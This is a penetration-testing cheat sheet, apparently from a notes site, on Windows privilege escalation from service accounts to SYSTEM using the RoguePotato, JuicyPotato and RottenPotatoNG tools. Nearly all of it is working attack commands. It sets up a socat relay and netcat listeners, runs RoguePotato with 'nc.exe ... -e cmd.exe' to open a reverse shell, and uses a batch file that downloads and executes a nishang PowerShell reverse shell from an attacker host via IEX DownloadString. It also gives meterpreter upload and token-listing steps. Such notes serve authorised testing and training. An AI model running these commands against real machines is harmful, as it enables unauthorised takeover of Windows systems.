Juicy Potato, Rotten Potato (NG)

Required privs

SeImpersonatePrivilege

(show privs via whoami /priv)

RoguePotato

Another Windows Local Privilege Escalation from Service Account to System https://github.com/antonioCoco/RoguePotato

Setup relay (can run e.g. on attacking machine)

socat tcp-listen:135,reuseaddr,fork tcp:<target-ip>:9999

Set up listener

nc -nlvp 1337

Run exploit

RoguePotato.exe -r <relay-ip> -e "nc.exe <local-ip> 1337 -e cmd.exe" -l 9999

JuicyPotato

A sugared version of RottenPotatoNG, with a bit of juice, i.e. another Local Privilege Escalation tool, from a Windows Service Accounts to NT AUTHORITY\SYSTEM. Releases · ohpe/juicy-potato · GitHub -> https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe

⚠️ ** Microsoft patched this Vulnerability in Windows Versions 1809/Build 17763** ⚠️ (works until 1803 / 17134)

No more rotten/juicy potato? – Decoder's Blog

Example

Using nishang reverse shell

/usr/share/nishang/Shells/Invoke-PowerShellTcp.ps1

-> append Invoke-PowerShellTcp -Reverse -IPAddress <ip> -Port <port> to the end of the file to automatically execute the shell

Create and upload helper bat file to execute powershell stuff

shell.bat
cmd /c powershell.exe -ExecutionPolicy Bypass -Command IEX (New-Object System.Net.WebClient).DownloadString('http://<ip>/Invoke-PowerShellTcp.ps1')

Start listener

nc -nlvp <port>

Execute

.\JuicyPotato.exe -t * -p C:\Users\<user>\Documents\shell.bat -l 1234

-> Currently unsure why l is needed

⚠️ Troubleshooting ⚠️

If not working (e.g. error 10038) try another clsid from

-c '{<cls-id>}'

RottenPotatoNG

New version of RottenPotato as a C++ DLL and standalone C++ binary - no need for meterpreter or other tools.

In msf meterpreter (multi/handler)

upload /path/to/rottenpotato.exe
execute -cH -f rottenpotato.exe

``` load incognito list_tokens -u ```

PreviousPowerSploitNextJAWS

Last updated